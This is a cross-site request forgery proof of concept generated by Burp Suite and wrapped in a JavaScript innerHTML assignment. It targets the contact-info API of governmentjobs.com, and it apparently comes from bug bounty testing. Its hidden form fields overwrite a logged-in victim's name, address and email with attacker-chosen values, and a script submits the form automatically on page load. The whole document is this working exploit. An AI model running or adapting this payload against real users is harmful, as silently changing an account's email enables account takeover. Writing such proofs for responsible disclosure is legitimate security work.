
document.body.innerHTML=`
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://www.governmentjobs.com/api/generalInfo/contactInfo?fromAppProcess=false&returnUrl=https%253A%252F%252Fwww.governmentjobs.com%252FApplications%252FAccountSettings%2523contact" method="POST">
      <input type="hidden" name="isDiscardChange" value="false" />
      <input type="hidden" name="enableEmailVerification" value="true" />
      <input type="hidden" name="fromAppProcess" value="false" />
      <input type="hidden" name="isEmailVerified" value="true" />
      <input type="hidden" name="isAccountSettingsPage" value="true" />
      <input type="hidden" name="name&#91;firstName&#93;" value="xxx" />
      <input type="hidden" name="name&#91;middleName&#93;" value="x" />
      <input type="hidden" name="name&#91;lastName&#93;" value="xx" />
      <input type="hidden" name="name&#91;formerName&#93;" value="" />
      <input type="hidden" name="address&#91;address1&#93;" value="dazdazdww" />
      <input type="hidden" name="address&#91;address2&#93;" value="" />
      <input type="hidden" name="address&#91;city&#93;" value="mrxbugcrowd" />
      <input type="hidden" name="address&#91;state&#93;&#91;id&#93;" value="54" />
      <input type="hidden" name="address&#91;state&#93;&#91;abbrvState&#93;" value="IT" />
      <input type="hidden" name="address&#91;state&#93;&#91;name&#93;" value="" />
      <input type="hidden" name="address&#91;state&#93;&#91;countryId&#93;" value="0" />
      <input type="hidden" name="address&#91;zipCode&#93;" value="10001" />
      <input type="hidden" name="address&#91;country&#93;&#91;id&#93;" value="7" />
      <input type="hidden" name="address&#91;country&#93;&#91;name&#93;" value="Angola" />
      <input type="hidden" name="address&#91;filteredStates&#93;&#91;0&#93;&#91;id&#93;" value="54" />
      <input type="hidden" name="address&#91;filteredStates&#93;&#91;0&#93;&#91;abbrvState&#93;" value="IT" />
      <input type="hidden" name="address&#91;filteredStates&#93;&#91;0&#93;&#91;name&#93;" value="International" />
      <input type="hidden" name="address&#91;filteredStates&#93;&#91;0&#93;&#91;sortCode&#93;" value="2" />
      <input type="hidden" name="address&#91;filteredStates&#93;&#91;0&#93;&#91;isUs&#93;" value="false" />
      <input type="hidden" name="address&#91;filteredStates&#93;&#91;0&#93;&#91;countryId&#93;" value="0" />
      <input type="hidden" name="phone&#91;primaryPhone&#93;" value="" />
      <input type="hidden" name="phone&#91;primaryPhoneExt&#93;" value="" />
      <input type="hidden" name="phone&#91;alternatePhone&#93;" value="" />
      <input type="hidden" name="phone&#91;alternatePhoneExt&#93;" value="" />
      <input type="hidden" name="textCaptchaViewModel&#91;userAnswer&#93;" value="" />
      <input type="hidden" name="textCaptchaViewModel&#91;isBusy&#93;" value="false" />
      <input type="hidden" name="textCaptchaViewModel&#91;customLabelHtmlContent&#93;" value="" />
      <input type="hidden" name="textCaptchaViewModel&#91;customUserAnswerInputId&#93;" value="" />
      <input type="hidden" name="initialEmail" value="poc4mrxx&#43;123&#64;gmail&#46;com" />
      <input type="hidden" name="emailAddress" value="poc4mrxx&#43;123&#64;gmail&#46;com" />
      <input type="hidden" name="isPasswordSet" value="true" />
      <input type="hidden" name="textCaptchaEnabled" value="true" />
      <input type="hidden" name="isEmailVerificationMode" value="false" />
      <input type="hidden" name="showCaptchaValidationMessage" value="false" />
      <input type="hidden" name="isEmailAddressAvailable" value="true" />
      <input type="hidden" name="changeEmailNotification" value="Your&#32;current&#32;email&#32;address&#32;is&#32;poc4mrxx&#43;123&#64;gmail&#46;com&#46;&#32;To&#32;change&#32;the&#32;email&#32;address&#44;&#32;please&#32;visit&#32;account&#32;settings&#32;page&#46;" />
      <input type="hidden" name="notificationPreference" value="1" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailAddress&#93;" value="" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;enableEmailVerification&#93;" value="true" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;isNeedToHideHeader&#93;" value="true" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;isNeedToHideInstructions&#93;" value="true" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;verificationCodeLabelText&#93;" value="Please&#32;enter&#32;the&#32;6&#32;digit&#32;code&#32;sent&#32;to&#32;your&#32;email&#32;address&#46;" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;verificationCodeAriaLabelText&#93;" value="We&apos;ve&#32;sent&#32;a&#32;6&#32;digit&#32;code&#32;to&#32;your&#32;email&#32;address&#32;and&#32;the&#32;code&#32;is&#32;only&#32;valid&#32;for&#32;30&#32;minutes&#46;&#32;Please&#32;enter&#32;the&#32;code&#32;below&#46;&#32;Please&#32;enter&#32;the&#32;6&#32;digit&#32;code&#32;sent&#32;to&#32;your&#32;email&#32;address&#46;" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;useCustomVerifyButton&#93;" value="true" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;textCaptchaViewModelForResendCode&#93;&#91;userAnswer&#93;" value="" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;textCaptchaViewModelForResendCode&#93;&#91;isBusy&#93;" value="false" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;textCaptchaViewModelForResendCode&#93;&#91;customLabelHtmlContent&#93;" value="" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;textCaptchaViewModelForResendCode&#93;&#91;customUserAnswerInputId&#93;" value="" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;textCaptchaViewModelForVerificationCode&#93;&#91;userAnswer&#93;" value="" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;textCaptchaViewModelForVerificationCode&#93;&#91;isBusy&#93;" value="false" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;textCaptchaViewModelForVerificationCode&#93;&#91;customLabelHtmlContent&#93;" value="" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;textCaptchaViewModelForVerificationCode&#93;&#91;customUserAnswerInputId&#93;" value="" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;textCaptchaEnabled&#93;" value="true" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;isNeedToShowEmailVerificationForm&#93;" value="false" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;isEmailVerified&#93;" value="true" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;userEmail&#93;" value="poc4mrxx&#43;123&#64;gmail&#46;com" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;verificationAttemptsCount&#93;" value="0" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;resendEmailVerificationCount&#93;" value="0" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;isEmailVerificationSubmitButtonEnabled&#93;" value="false" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;emailVerificationCode&#93;" value="" />
      <input type="hidden" name="contactInfoEmailVerificationViewModel&#91;emailVerificationViewModel&#93;&#91;changedEmailAddressWasAdded&#93;" value="false" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>`

